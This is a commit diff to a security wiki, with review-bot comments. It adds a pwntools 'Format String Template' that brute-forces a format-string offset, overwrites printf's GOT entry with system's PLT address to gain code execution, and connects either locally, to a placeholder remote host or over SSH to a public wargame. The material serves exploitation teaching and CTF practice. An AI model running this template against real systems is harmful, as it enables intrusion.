GitBook: [master] 6 pages modified

This commit is contained in:
CPol 2021-03-22 10:43:33 +00:00 committed by gitbook-bot
parent 87e120c205
commit db2b77cd01
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 125 additions and 4 deletions

View file

@ -424,8 +424,10 @@
## Exploiting ## Exploiting
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md) * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md) * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md) * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md) * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
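Review bot: the two added SUMMARY entries point at `exploiting/linux-exploiting-basic-esp/format-string-template.md` and `exploiting/linux-exploiting-basic-esp/rop-pwn-template.md`; the first file is created in this commit, but no hunk on this page shows `rop-pwn-template.md` being moved out of `misc/basic-python/`, so confirm the rename is part of the commit, otherwise the new ROP-PWN link resolves to a missing page.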
@ -462,7 +464,6 @@
* [Magic Methods](misc/basic-python/magic-methods.md) * [Magic Methods](misc/basic-python/magic-methods.md)
* [Web Requests](misc/basic-python/web-requests.md) * [Web Requests](misc/basic-python/web-requests.md)
* [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md) * [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md)
* [ROP-PWN template](misc/basic-python/rop-pwn-template.md)
* [Other Big References](misc/references.md) * [Other Big References](misc/references.md)
## TODO ## TODO
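Review bot: removing the `misc/basic-python/rop-pwn-template.md` entry here leaves any page that still links to that path with a dead link; the two link updates visible further down in this commit cover a single README, so grep the book for the old path before merging.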

View file

@ -400,6 +400,10 @@ Contiene las direcciones absolutas de las funciones que son utilizadas en un pro
or using GEF you can start a debugging session and execute `got` to see the got table. or using GEF you can start a debugging session and execute `got` to see the got table.
You an find a **template** to exploit the GOT using format-strings here:
{% page-ref page="format-string-template.md" %}
#### **Exploit \(format strings\)** #### **Exploit \(format strings\)**
Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit. Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit.
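Review bot: typo in the added line `You an find a **template** to exploit the GOT using format-strings here:`; it should read `You can find`. The added `{% page-ref page="format-string-template.md" %}` uses a relative ref, which is fine since the new template sits in the same directory as this README.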

View file

@ -0,0 +1,116 @@
# Format String Template
```python
from pwn import *
####################
#### CONNECTION ####
####################
# Define how you want to exploit the binary
LOCAL = True
REMOTETTCP = False
REMOTESSH = False
GDB = False
# Configure vulnerabily binary
LOCAL_BIN = "./tyler"
REMOTE_BIN = "./tyler" #For ssh
# In order to exploit the format string you may need to append/prepend some string to the payload
# configure them here
PREFIX_PAYLOAD = b"echo "
SUFFIX_PAYLOAD = b""
def connect_binary():
global P, ELF_LOADED, ROP_LOADED
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
########################################
#### Get format string configuration ###
########################################
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
P.sendline(payload)
return P.recv()
def get_formatstring_config():
global P
for offset in range(1,1000):
connect_binary()
P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
else:
payload = b" " + payload
recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload
# is being reflected. Then, you will be able to put in the position arbitrary addresses
# and write arbitrary content in those addresses
# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
offset, padlen = get_formatstring_config()
# In this template, the GOT of printf (the part of the GOT table that points to where the printf
# function resides) is going to be modified by the address of the system inside the PLT (the
# part of the code that will jump to the system function).
# Therefore, next time the printf function is executed, system will be executed instead with the same
# parameters passed to printf
SYSTEM_PLT = ELF_LOADED.plt["system"]
P_GOT = ELF_LOADED.got["printf"]
log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
log.info(f"Printf GOT address: {hex(P_GOT)}")
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
format_string.write(P_GOT, SYSTEM_PLT)
format_string.execute_writes()
# Now that printf function is executing system you just need to find a place where you can
# control the parameters passed to printf to execute arbitrary code.
P.interactive()
```
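Review bot: `ROP_LOADED = ROP(elf)` in the `REMOTESSH` branch references an undefined name and will raise `NameError`; the other two branches use `ROP(ELF_LOADED)`, so this one should too. Two smaller points in `get_formatstring_config`: it calls `connect_binary()` on every iteration of `range(1,1000)` without closing the previous process, so a long search leaks up to a thousand child processes (call `P.close()` before reconnecting), and if no offset is found it falls off the end and returns `None`, so `offset, padlen = get_formatstring_config()` fails with an unpacking `TypeError` instead of a clear message. Also `recieved` is misspelled throughout and the leftover `print(recieved)` debug line would be better as `log.debug`.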

View file

@ -34,7 +34,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie
## ROP - PWNtools template ## ROP - PWNtools template
\*\*\*\*[**Find my ROP-PWNtools template here.**](../../misc/basic-python/rop-pwn-template.md) I'm going to use the code located there to make the exploit. \*\*\*\*[**Find my ROP-PWNtools template here.**](rop-pwn-template.md) I'm going to use the code located there to make the exploit.
Download the exploit and place it in the same directory as the vulnerable binary. Download the exploit and place it in the same directory as the vulnerable binary.
## 1- Finding the offset ## 1- Finding the offset
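Review bot: the relocated link correctly points at the sibling `rop-pwn-template.md`, but the leading `\*\*\*\*` escaped-asterisk residue in front of the link is carried over unchanged and renders as literal asterisks; drop it while touching the line.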
@ -251,9 +251,9 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
## EXPLOIT FILE ## EXPLOIT FILE
Here you have the final exploit after having performed all the necessary changes to the original [**template.py**](../../misc/basic-python/rop-pwn-template.md) **file**. You can find a template to exploit this vulnerability here:
{% file src="../../.gitbook/assets/template.py" caption="template.py" %} {% page-ref page="rop-pwn-template.md" %}
## Common problems ## Common problems
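Review bot: the replacement text `You can find a template to exploit this vulnerability here:` no longer matches the section heading `## EXPLOIT FILE`, and dropping the `{% file src="../../.gitbook/assets/template.py" caption="template.py" %}` embed removes the finished, already-adapted exploit the old sentence described ("after having performed all the necessary changes"); either keep that file alongside the new page-ref or rename the heading and state which template values the reader has to change.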